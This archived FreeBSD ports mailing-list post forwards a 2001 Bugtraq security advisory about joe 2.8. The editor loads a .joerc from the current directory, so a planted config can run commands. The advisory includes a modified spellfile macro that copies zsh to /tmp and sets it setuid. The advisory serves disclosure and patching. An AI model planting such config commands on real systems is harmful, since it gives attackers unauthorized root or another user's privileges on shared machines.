Date: Wed, 28 Feb 2001 11:05:53 -0600 (CST) From: Kevin Day <toasty@temphost.dragondata.com> To: ports@freebsd.org Subject: Joe's Own Editor File Handling Error (fwd) Message-ID: <200102281705.LAA78614@temphost.dragondata.com>
next in thread | raw e-mail | index | archive | help
I'm working on a patch for this right now, don't FORDBID the port yet. :) -- Kevin Forwarded message: > From owner-bugtraq@SECURITYFOCUS.COM Wed Feb 28 10:54:24 2001 > Approved-By: beng@SECURITYFOCUS.COM > Delivered-To: bugtraq@lists.securityfocus.com > Delivered-To: bugtraq@securityfocus.com > X-Mailer: Lotus Notes Release 5.0.6a January 17, 2001 > X-MIMETrack: Serialize by Router on tracy/Wkit(Release 5.0.4a |July 24, > 2000) at 2001-02-28 15:13:46 > MIME-Version: 1.0 > Content-type: text/plain; charset=iso-8859-1 > Message-ID: <OF61B9B540.D6BC1630-ONC1256A01.004D1564@wkit.se> > Date: Wed, 28 Feb 2001 15:13:42 +0100 > Reply-To: advisories@WKIT.COM > Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> > From: advisories@WKIT.COM > Subject: Joe's Own Editor File Handling Error > X-To: submissions@packetstorm.security.com > To: BUGTRAQ@SECURITYFOCUS.COM > Content-Transfer-Encoding: 8bit > X-MIME-Autoconverted: from quoted-printable to 8bit by temphost.dragondata.com id KAA77924 > > WKIT SECURITY AB > www.wkit.com > > > TITLE: Joe's Own Editor File Handling Error > ADVISORY ID: WSIR-01/02-02 > REFERENCE: http://www.wkit.com/advisories > CVE: GENERIC-MAP-NOMATCH > CREDIT: Christer Öberg, Wkit Security AB > CONTACT: advisories@wkit.com > CLASS: File Handling Error > OBJECT: joe(1) (exec) > VENDOR: Josef H. Allen > STATUS: > REMOTE: No > LOCAL: Yes > VULNERABLE: Joseph Allen joe 2.8 > > DATE > CREATED: 26/02/2001 > LAST UPDATED: > VENDOR CONTACT: > RELEASE: 28/02/2001 > > VULNERABILITY DESCRIPTION > joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and > /usr/local/lib/joerc in that order. Users could be tricked into execute > commands if they open/edit a file with joe in a directory where other > users can write. > > CONDITIONS > User using joe in a world/group writable directory. > > EXAMPLE > A user copy the default joerc file to a world writable directory and > change > :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty > >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype > to > :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty > >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod > 4755 /tmp/suid",rtn,retype > Another user opens a file in that directory with joe and run ispell with > ^[l the result is a suid shell in /tmp > > SOLUTION/VENDOR INFORMATION/WORKAROUND > > DISCLAIMER > The contents of this advisory may be distributed freely, provided that > no fee is charged and proper credit is given. Wkit Security AB takes > no credit for this discovery if someone else has published this > information in the public domain before this advisory was released. > The information herein is intended for educational purposes, not for > malicious use. Wkit Security AB takes no responsibility whatsoever for > the > use of this information. > > ABOUT > Wkit Security AB is an independent data security company working with > security-related services and products. > > Wkit Security AB > Upperudsv. 4 > S-464 72 Håverud > SWEDEN > http://www.wkit.com > e-mail: advisories@wkit.com > > (C) 2001 WKIT SECURITY AB > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200102281705.LAA78614>